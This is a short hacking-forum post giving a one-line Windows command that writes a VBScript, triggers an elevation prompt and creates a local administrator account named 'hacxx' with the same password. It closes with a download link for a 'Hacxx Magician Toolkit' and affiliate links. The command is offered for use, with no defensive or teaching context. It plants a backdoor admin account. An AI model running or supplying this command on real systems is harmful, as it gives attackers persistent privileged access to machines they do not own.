UAC - Add an Admin Account on Windows with one line

Post Reply
ledger
Posts: 311
Joined: 23 Sep 2022, 00:28

UAC - Add an Admin Account on Windows with one line

Post by ledger » 17 Dec 2022, 00:32

Code: Select all

cmd.exe /c echo Set UAC = CreateObject("Shell.Application") >1b.vbs && echo UAC.ShellExecute "cmd.exe", "/c net user /add hacxx hacxx && net localgroup administrators hacxx /add", , "runas", 1 >>1b.vbs && 1b.vbs
Image

Download: Hacxx Magician Toolkit Update 3
https://filecrypt.cc/Container/B94F04A70D.html
BestChange - Exchange money at the best rates - https://www.bestchange.com/?p=936130
Peer2Profit - Make up to $0.10 per GB. Minimum Payout $1 - https://bit.ly/Peer2Profit
Protect yourself with Pure VPN - https://billing.purevpn.com/aff.php?aff=44512

Post Reply